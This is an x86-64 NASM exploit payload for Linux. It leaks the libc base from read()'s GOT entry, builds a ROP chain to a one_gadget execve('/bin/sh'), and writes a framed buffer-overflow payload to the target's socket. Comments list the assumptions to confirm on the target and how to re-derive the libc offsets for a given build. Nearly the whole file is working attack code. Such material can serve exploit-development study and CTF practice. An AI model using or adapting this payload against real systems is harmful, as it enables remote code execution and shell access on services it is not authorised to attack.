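; Stage-2 payload: x86-64 Linux, NASM syntax, raw syscalls, no libc.
;
; What it does: reads the already-resolved GOT entry of read() to derive the
; libc base, builds a two-entry "ROP chain" (a gadget that leaves rax == 0,
; then a one_gadget execve("/bin/sh")) in a writable slot, and writes a
; framed payload followed by that chain to a descriptor taken from the
; hijacked function's stack frame. It then spins forever; it never returns.
;
; Assumptions this code makes about the target process. None of them are
; checked at runtime -- confirm each against the target before use:
;   * Non-PIE binary: READ_GOT and ROP_SLOT are absolute addresses, so no
;     `default rel` here on purpose.
;   * read() has been called at least once, so [READ_GOT] holds the libc
;     address of read() and not the lazy-binding PLT stub. If not, the
;     computed libc base is garbage and the chain jumps into the void.
;   * rbp still points at the hijacked function's frame and
;     [rbp - FD_SLOT_OFF] holds the descriptor to send the payload to
;     (presumably the client socket -- verify in the function's disassembly).
;   * ROP_SLOT .. ROP_SLOT+15 is mapped writable (.bss/.data of the binary).
;   * Every libc offset below is tied to ONE libc build. Re-derive them for
;     the target's libc (`readelf -s libc.so.6 | grep ' read@@'` for
;     LIBC_READ_OFF, the one_gadget tool for the gadget offsets). A mismatch
;     crashes the target instead of spawning a shell.
;
; Register use: rbx = libc base, rcx = scratch, rsi = payload pointer,
; rdi/rdx/rax = syscall arguments. `syscall` clobbers rcx and r11; nothing
; below depends on either surviving a syscall.
;
; The payload contains NUL bytes (absolute addresses, length fields), so it
; must be delivered over a channel that is not NUL-terminated (e.g. read()).

bits 64

; --- target-specific constants -----------------------------------------------
READ_GOT        equ 0x602060    ; GOT slot of read() in the target binary
LIBC_READ_OFF   equ 0xf7250     ; offset of read() inside the target's libc
GADGET_ZERO_RAX equ 0x8b8c5     ; first chain entry; presumably a gadget that
                                ; leaves rax == 0 before returning -- check
                                ; with objdump, this file does not prove it
ONE_GADGET      equ 0x45216     ; one_gadget execve("/bin/sh"), needs rax == 0
ROP_SLOT        equ 0x602100    ; writable 16-byte slot the chain is built in
ROP_LEN         equ 16          ; two 8-byte gadget addresses
FD_SLOT_OFF     equ 0x2c        ; [rbp - FD_SLOT_OFF] = descriptor to write to

SYS_WRITE       equ 1

section .text

global _start

_start:
    ; rbx = libc base, derived from the resolved read() GOT entry
    mov     rbx, [READ_GOT]
    sub     rbx, LIBC_READ_OFF

    ; chain[0]: gadget that satisfies ONE_GADGET's rax == 0 constraint.
    ; This does NOT zero rax here; it only stores the gadget's address so
    ; it runs first once the chain is triggered on the target.
    lea     rcx, [rbx + GADGET_ZERO_RAX]
    mov     [ROP_SLOT], rcx

    ; chain[1]: one_gadget execve("/bin/sh", ...)
    lea     rcx, [rbx + ONE_GADGET]
    mov     [ROP_SLOT + 8], rcx

    ; jmp/call/pop trick: land on `call send_payload` so the return address
    ; pushed by the call is the address of `payload` (position independent).
    jmp     get_payload_addr

send_payload:
    ; Part 1: framing header + padding. `pop rsi` takes the return address
    ; pushed by `call`, i.e. the start of `payload`, and restores rsp.
    mov     rdi, [rbp - FD_SLOT_OFF]
    pop     rsi
    mov     edx, PAYLOAD_LEN
    mov     eax, SYS_WRITE
    syscall

    ; Part 2: the 16-byte chain built above.
    ; NOTE(review): neither write's return value (negative = -errno, or a
    ; short count) is checked; on failure the target is simply left waiting.
    mov     rdi, [rbp - FD_SLOT_OFF]
    mov     esi, ROP_SLOT
    mov     edx, ROP_LEN
    mov     eax, SYS_WRITE
    syscall

hang:
    ; Never return to the caller's (now corrupted) frame.
    jmp     hang

get_payload_addr:
    call    send_payload
payload:
    ; Looks like a protocol header: a newline plus a little-endian 32-bit
    ; length 0x88 = 136 = 120 bytes of padding + 16 bytes of chain.
    ; TODO confirm against the target's read loop.
    db      0x0a, 0x88, 0x00, 0x00, 0x00
    ; 112 * 'A' filler up to the saved-register slot, then 8 * 'B' that the
    ; chain's first entry overwrites (inferred from the 136-byte length
    ; field -- verify the exact distance on the target).
    db      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBB"
; Length of part 1, computed by the assembler so it cannot drift from the
; literal above (the previous hard-coded 125 had to be kept in sync by hand).
PAYLOAD_LEN     equ $ - payload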

